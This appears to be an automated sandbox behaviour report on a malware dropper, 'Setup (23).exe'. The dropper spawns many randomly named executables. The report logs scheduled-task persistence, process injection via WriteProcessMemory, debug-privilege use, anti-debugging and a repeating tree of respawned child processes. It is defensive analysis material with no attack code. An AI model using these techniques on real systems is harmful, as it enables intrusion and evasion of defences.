Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8zu5BlCvH6XbjUyBbrDQMMsR.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8zu5BlCvH6XbjUyBbrDQMMsR.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4976 schtasks.exe
204 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

8328 taskkill.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 130 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
4976	schtasks.exe
204	schtasks.exe

pid	process
8328	taskkill.exe

description	flow	ioc
HTTP User-Agent header	130	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

Setup (23).exe8zu5BlCvH6XbjUyBbrDQMMsR.exe

pid	process
1592	Setup (23).exe
1592	Setup (23).exe
3716	8zu5BlCvH6XbjUyBbrDQMMsR.exe
3716	8zu5BlCvH6XbjUyBbrDQMMsR.exe
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

8zu5BlCvH6XbjUyBbrDQMMsR.exe

pid process

3716 8zu5BlCvH6XbjUyBbrDQMMsR.exe

pid	process
3716	8zu5BlCvH6XbjUyBbrDQMMsR.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

yJ0w_PFws52zIA5lf0zuOaT_.exewA1QzOOSwqJoESjFl9ItpcfI.exeEt386eo4H7fyeQ96XtoQdW04.exeIDqaKyGy46PBAbQsG8fyhkNY.exejtekxXy10dQo9GRFnjVgDBca.exeBlKCMNz7NjwRGtvSQRxnNy_V.exeC26RJLqvVeUnUeOcGiaiXZcf.exeC26RJLqvVeUnUeOcGiaiXZcf.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	3588	yJ0w_PFws52zIA5lf0zuOaT_.exe
Token: SeDebugPrivilege	3840	wA1QzOOSwqJoESjFl9ItpcfI.exe
Token: SeDebugPrivilege	684	Et386eo4H7fyeQ96XtoQdW04.exe
Token: SeDebugPrivilege	2604	IDqaKyGy46PBAbQsG8fyhkNY.exe
Token: SeDebugPrivilege	3988	jtekxXy10dQo9GRFnjVgDBca.exe
Token: SeDebugPrivilege	2320	BlKCMNz7NjwRGtvSQRxnNy_V.exe
Token: SeDebugPrivilege	5060	C26RJLqvVeUnUeOcGiaiXZcf.exe
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeDebugPrivilege	4228	C26RJLqvVeUnUeOcGiaiXZcf.exe
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeRestorePrivilege	5280	WerFault.exe
Token: SeBackupPrivilege	5280	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (23).exe

description	pid	process	target process
PID 1592 wrote to memory of 3588	1592	Setup (23).exe	yJ0w_PFws52zIA5lf0zuOaT_.exe
PID 1592 wrote to memory of 3588	1592	Setup (23).exe	yJ0w_PFws52zIA5lf0zuOaT_.exe
PID 1592 wrote to memory of 3728	1592	Setup (23).exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 1592 wrote to memory of 3728	1592	Setup (23).exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 1592 wrote to memory of 3728	1592	Setup (23).exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 1592 wrote to memory of 2272	1592	Setup (23).exe	MKhCIDEDBR_9XiO3j6GLjfon.exe
PID 1592 wrote to memory of 2272	1592	Setup (23).exe	MKhCIDEDBR_9XiO3j6GLjfon.exe
PID 1592 wrote to memory of 2272	1592	Setup (23).exe	MKhCIDEDBR_9XiO3j6GLjfon.exe
PID 1592 wrote to memory of 2320	1592	Setup (23).exe	BlKCMNz7NjwRGtvSQRxnNy_V.exe
PID 1592 wrote to memory of 2320	1592	Setup (23).exe	BlKCMNz7NjwRGtvSQRxnNy_V.exe
PID 1592 wrote to memory of 2320	1592	Setup (23).exe	BlKCMNz7NjwRGtvSQRxnNy_V.exe
PID 1592 wrote to memory of 3988	1592	Setup (23).exe	jtekxXy10dQo9GRFnjVgDBca.exe
PID 1592 wrote to memory of 3988	1592	Setup (23).exe	jtekxXy10dQo9GRFnjVgDBca.exe
PID 1592 wrote to memory of 3988	1592	Setup (23).exe	jtekxXy10dQo9GRFnjVgDBca.exe
PID 1592 wrote to memory of 3716	1592	Setup (23).exe	8zu5BlCvH6XbjUyBbrDQMMsR.exe
PID 1592 wrote to memory of 3716	1592	Setup (23).exe	8zu5BlCvH6XbjUyBbrDQMMsR.exe
PID 1592 wrote to memory of 3716	1592	Setup (23).exe	8zu5BlCvH6XbjUyBbrDQMMsR.exe
PID 1592 wrote to memory of 3256	1592	Setup (23).exe	AtgfylhhxHNLjURwlJjyOtIM.exe
PID 1592 wrote to memory of 3256	1592	Setup (23).exe	AtgfylhhxHNLjURwlJjyOtIM.exe
PID 1592 wrote to memory of 3256	1592	Setup (23).exe	AtgfylhhxHNLjURwlJjyOtIM.exe
PID 1592 wrote to memory of 4036	1592	Setup (23).exe	iLzvlQbBihOlVLP7qToVz1b5.exe
PID 1592 wrote to memory of 4036	1592	Setup (23).exe	iLzvlQbBihOlVLP7qToVz1b5.exe
PID 1592 wrote to memory of 3148	1592	Setup (23).exe	9cLqEsI0vXIaeEh3T6RksIH_.exe
PID 1592 wrote to memory of 3148	1592	Setup (23).exe	9cLqEsI0vXIaeEh3T6RksIH_.exe
PID 1592 wrote to memory of 3148	1592	Setup (23).exe	9cLqEsI0vXIaeEh3T6RksIH_.exe
PID 1592 wrote to memory of 4044	1592	Setup (23).exe	30KVL6nXUeMHDAbGiWz_82kI.exe
PID 1592 wrote to memory of 4044	1592	Setup (23).exe	30KVL6nXUeMHDAbGiWz_82kI.exe
PID 1592 wrote to memory of 4044	1592	Setup (23).exe	30KVL6nXUeMHDAbGiWz_82kI.exe
PID 1592 wrote to memory of 1672	1592	Setup (23).exe	d5twSMRR4K0XE4E70WyeSSax.exe
PID 1592 wrote to memory of 1672	1592	Setup (23).exe	d5twSMRR4K0XE4E70WyeSSax.exe
PID 1592 wrote to memory of 1672	1592	Setup (23).exe	d5twSMRR4K0XE4E70WyeSSax.exe
PID 1592 wrote to memory of 3984	1592	Setup (23).exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 1592 wrote to memory of 3984	1592	Setup (23).exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 1592 wrote to memory of 3984	1592	Setup (23).exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 1592 wrote to memory of 2604	1592	Setup (23).exe	IDqaKyGy46PBAbQsG8fyhkNY.exe
PID 1592 wrote to memory of 2604	1592	Setup (23).exe	IDqaKyGy46PBAbQsG8fyhkNY.exe
PID 1592 wrote to memory of 2604	1592	Setup (23).exe	IDqaKyGy46PBAbQsG8fyhkNY.exe
PID 1592 wrote to memory of 3840	1592	Setup (23).exe	wA1QzOOSwqJoESjFl9ItpcfI.exe
PID 1592 wrote to memory of 3840	1592	Setup (23).exe	wA1QzOOSwqJoESjFl9ItpcfI.exe
PID 1592 wrote to memory of 3840	1592	Setup (23).exe	wA1QzOOSwqJoESjFl9ItpcfI.exe
PID 1592 wrote to memory of 4028	1592	Setup (23).exe	hNXNBKN1amDNvT0pTwA9Jd5K.exe
PID 1592 wrote to memory of 4028	1592	Setup (23).exe	hNXNBKN1amDNvT0pTwA9Jd5K.exe
PID 1592 wrote to memory of 4028	1592	Setup (23).exe	hNXNBKN1amDNvT0pTwA9Jd5K.exe
PID 1592 wrote to memory of 1108	1592	Setup (23).exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
PID 1592 wrote to memory of 1108	1592	Setup (23).exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
PID 1592 wrote to memory of 1108	1592	Setup (23).exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
PID 1592 wrote to memory of 684	1592	Setup (23).exe	Et386eo4H7fyeQ96XtoQdW04.exe
PID 1592 wrote to memory of 684	1592	Setup (23).exe	Et386eo4H7fyeQ96XtoQdW04.exe
PID 1592 wrote to memory of 684	1592	Setup (23).exe	Et386eo4H7fyeQ96XtoQdW04.exe
PID 1592 wrote to memory of 2816	1592	Setup (23).exe	Doc8sn8FnxfF7ycbDLoMoE3c.exe
PID 1592 wrote to memory of 2816	1592	Setup (23).exe	Doc8sn8FnxfF7ycbDLoMoE3c.exe
PID 1592 wrote to memory of 2816	1592	Setup (23).exe	Doc8sn8FnxfF7ycbDLoMoE3c.exe
PID 1592 wrote to memory of 2188	1592	Setup (23).exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 1592 wrote to memory of 2188	1592	Setup (23).exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 1592 wrote to memory of 2188	1592	Setup (23).exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 1592 wrote to memory of 2368	1592	Setup (23).exe	GlcT3nCcuGvmoDEZK75Ke4M8.exe
PID 1592 wrote to memory of 2368	1592	Setup (23).exe	GlcT3nCcuGvmoDEZK75Ke4M8.exe
PID 1592 wrote to memory of 2368	1592	Setup (23).exe	GlcT3nCcuGvmoDEZK75Ke4M8.exe
PID 1592 wrote to memory of 4124	1592	Setup (23).exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
PID 1592 wrote to memory of 4124	1592	Setup (23).exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
PID 1592 wrote to memory of 4124	1592	Setup (23).exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
PID 1592 wrote to memory of 4136	1592	Setup (23).exe	1AX2C4itmKm79vcHJb50pVbn.exe
PID 1592 wrote to memory of 4136	1592	Setup (23).exe	1AX2C4itmKm79vcHJb50pVbn.exe
PID 1592 wrote to memory of 4136	1592	Setup (23).exe	1AX2C4itmKm79vcHJb50pVbn.exe

C:\Users\Admin\AppData\Local\Temp\Setup (23).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (23).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1592

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
"C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3728

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
PID:4952

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
PID:4160

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:3228

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
PID:5808

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
PID:5480

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
PID:5140

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
- Executes dropped EXE
PID:5108

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:5628

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:4892

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:4296

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:6148

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:6560

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:6988

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:6372

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:6348

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:2888

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:6360

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:7476

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:7924

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:6368

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:8036

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:7988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7988 -s 24
4⤵
- Program crash
PID:6424

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:5804

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:4004

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:8696

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:9188

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:8944

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:9208

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:9404

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:10016

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:9952

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:9740

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:10080

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:4860

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:2156

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:1672

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:10604

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:11084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 11084 -s 24
4⤵
- Program crash
PID:4568

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:10632

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:7724

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:10588

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:11280

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:11692

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12256

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:4772

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12132

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:4480

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12396

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:13048

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12788

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12488

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12976

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12332

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12172

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:13608

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:14228

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:7816

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:13656

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:14084

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:13348

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:14916

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:14444

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:14968

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:11016

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:14388

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:15364

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 16012 -s 24
4⤵
- Program crash
PID:15388

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:15608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 15608 -s 24
4⤵
- Program crash
PID:16248

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16032

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 16244 -s 24
4⤵
- Program crash
PID:1172

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:15816

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:1172

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:15728

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:5476

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16668

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16580

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16592

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:12824

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16648

C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
C:\Users\Admin\Documents\C26RJLqvVeUnUeOcGiaiXZcf.exe
3⤵
PID:16800

C:\Users\Admin\Documents\yJ0w_PFws52zIA5lf0zuOaT_.exe
"C:\Users\Admin\Documents\yJ0w_PFws52zIA5lf0zuOaT_.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\Users\Admin\Documents\MKhCIDEDBR_9XiO3j6GLjfon.exe
"C:\Users\Admin\Documents\MKhCIDEDBR_9XiO3j6GLjfon.exe"
2⤵
- Executes dropped EXE
PID:2272

C:\Users\Admin\Documents\BlKCMNz7NjwRGtvSQRxnNy_V.exe
"C:\Users\Admin\Documents\BlKCMNz7NjwRGtvSQRxnNy_V.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Users\Admin\Documents\8zu5BlCvH6XbjUyBbrDQMMsR.exe
"C:\Users\Admin\Documents\8zu5BlCvH6XbjUyBbrDQMMsR.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3716

C:\Users\Admin\Documents\jtekxXy10dQo9GRFnjVgDBca.exe
"C:\Users\Admin\Documents\jtekxXy10dQo9GRFnjVgDBca.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Users\Admin\Documents\AtgfylhhxHNLjURwlJjyOtIM.exe
"C:\Users\Admin\Documents\AtgfylhhxHNLjURwlJjyOtIM.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3256

C:\Users\Admin\Documents\AtgfylhhxHNLjURwlJjyOtIM.exe
"C:\Users\Admin\Documents\AtgfylhhxHNLjURwlJjyOtIM.exe"
3⤵
- Executes dropped EXE
PID:6060

C:\Users\Admin\Documents\d5twSMRR4K0XE4E70WyeSSax.exe
"C:\Users\Admin\Documents\d5twSMRR4K0XE4E70WyeSSax.exe"
2⤵
- Executes dropped EXE
PID:1672

C:\Users\Admin\Documents\30KVL6nXUeMHDAbGiWz_82kI.exe
"C:\Users\Admin\Documents\30KVL6nXUeMHDAbGiWz_82kI.exe"
2⤵
